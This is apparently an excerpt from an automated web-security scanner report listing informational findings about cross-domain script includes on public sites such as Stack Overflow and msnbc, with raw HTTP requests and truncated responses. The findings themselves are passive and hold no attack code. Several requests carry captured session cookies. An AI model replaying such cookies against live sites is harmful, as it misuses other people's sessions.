The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://images.video.msn.com/js/ch/channels.js

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 01:50:53 GMT
Server: Microsoft-IIS/6.0
Server: Secure3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:00:53 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.294. https://security.live.com/LoginStage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://security.live.com
Path:	/LoginStage.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://secure.wlxrs.com/UTvyLWe4NTcjsg1fWir74g/liteframework.js

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.295. http://seedmagazine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seedmagazine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/mootools/1.2.1/mootools-yui-compressed.js
http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: seedmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:01 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: exp_last_visit=981011942; expires=Mon, 30-Jan-2012 02:19:02 GMT; path=/
Set-Cookie: exp_last_activity=1296371942; expires=Mon, 30-Jan-2012 02:19:02 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 02:19:02 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 31451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<
...[SNIP]...


<script src="http://ajax.googleapis.com/ajax/libs/mootools/1.2.1/mootools-yui-compressed.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.296. http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/Forums/en-US/windowsphone7series/threads

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://ajax.aspnetcdn.com/ajax/jquery/jquery-1.4.4.min.js

Request

GET /Forums/en-US/windowsphone7series/threads HTTP/1.1
Host: social.msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.297. http://spacefellowship.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spacefellowship.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: spacefellowship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:03 GMT
Server: Apache
Set-Cookie: sfs_session=cc2c07278f598760f84f6726d5e79843; expires=Sat, 19-Jan-2013 02:19:03 GMT; path=/; domain=spacefellowship.com; httponly
Connection: close
Content-Type: text/html; charset: utf-8
Content-Length: 92137

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23.298. http://stackoverflow.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://edge.quantserve.com/quant.js
http://sstatic.net/js/master.min.js?v=e8eb0725b4bd

Request

GET / HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 15:12:26 GMT
Last-Modified: Sun, 30 Jan 2011 15:11:26 GMT
Vary: *
Date: Sun, 30 Jan 2011 15:11:25 GMT
Content-Length: 194989

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Stack Overflow</title>

<link rel="stylesheet" type="text/css
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.299. http://stackoverflow.com/questions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/questions

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://edge.quantserve.com/quant.js
http://sstatic.net/js/master.min.js?v=e8eb0725b4bd

Request

GET /questions HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:42 GMT
Content-Length: 51939

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Newest Questions - Stack Overflow</title>

<link rel="stylesh
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.300. http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://edge.quantserve.com/quant.js
http://sstatic.net/Js/wmd.js?v=508538fa9757
http://sstatic.net/js/master.min.js?v=e8eb0725b4bd
http://sstatic.net/js/question.js?v=46e26c3f9a63

Request

GET /questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 15:13:38 GMT
Last-Modified: Sun, 30 Jan 2011 15:12:38 GMT
Vary: *
Date: Sun, 30 Jan 2011 15:12:38 GMT
Content-Length: 32716

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>PHP: Facebook Like box - Being able to like the current page using dyna
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
<link rel="alternate" type="application/atom+xml" title="Feed for question 'PHP: Facebook Like box - Being able to like the current page using dynamic URL '" href="/feeds/question/4843433">

<script src="http://sstatic.net/js/question.js?v=46e26c3f9a63" type="text/javascript"></script>
...[SNIP]...
</h2>

<script src="http://sstatic.net/Js/wmd.js?v=508538fa9757" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.301. http://stackoverflow.com/tags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/tags

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://edge.quantserve.com/quant.js
http://sstatic.net/Js/third-party/jquery.typewatch.js
http://sstatic.net/js/master.min.js?v=e8eb0725b4bd

Request

GET /tags HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.2.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:43 GMT
Content-Length: 25906

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Tags - Stack Overflow</title>

<link rel="stylesheet" type="t
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
</script>

<script src="http://sstatic.net/Js/third-party/jquery.typewatch.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.302. http://stackoverflow.com/users previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/users

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://edge.quantserve.com/quant.js
http://sstatic.net/Js/third-party/jquery.typewatch.js
http://sstatic.net/js/master.min.js?v=e8eb0725b4bd

Request

GET /users HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/tags
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.3.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:47 GMT
Content-Length: 39001

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Users - Stack Overflow</title>

<link rel="stylesheet" type="
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
</script>

<script src="http://sstatic.net/Js/third-party/jquery.typewatch.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.303. http://stackoverflow.com/users/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/users/login

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://edge.quantserve.com/quant.js
http://sstatic.net/Js/third-party/openid-jquery.js?v=7
http://sstatic.net/js/master.min.js?v=e8eb0725b4bd

Request

Response

23.304. http://suzanne-choney.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://suzanne-choney.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: suzanne-choney.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=6046a552d588b2b1ca9c2098d0a526d4; expires=Sat, 25-Jan-2031 02:19:28 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.305. http://technolog.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630
http://www.polls.newsvine.com/_static/js/5e374218b458bef20a9b343255be99bcb1dc1c08.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET / HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.306. http://technolog.msnbc.redacted/_feeds/rss2/author previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_feeds/rss2/author

Issue detail

The response dynamically includes the following script from another domain:

http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630

Request

GET /_feeds/rss2/author HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Last-Modified: Fri, 28 Jan 2011 23:34:03 +0000
Content-Type: text/xml; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:29:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 174921

<?xml version="1.0" encoding="utf-8"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:activity="http://activitystrea.ms/spec/1.0
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...

23.307. http://technolog.msnbc.redacted/_news/2010/08/10/4864065-motorolas-pumped-up-droid-2-ships-thursday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/10/4864065-motorolas-pumped-up-droid-2-ships-thursday

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/9d96c8b3032770da5152df3c93298ef8d7e4320a.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2010/08/10/4864065-motorolas-pumped-up-droid-2-ships-thursday HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.308. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/9d96c8b3032770da5152df3c93298ef8d7e4320a.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2010/08/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.309. http://technolog.msnbc.redacted/_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/9d96c8b3032770da5152df3c93298ef8d7e4320a.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
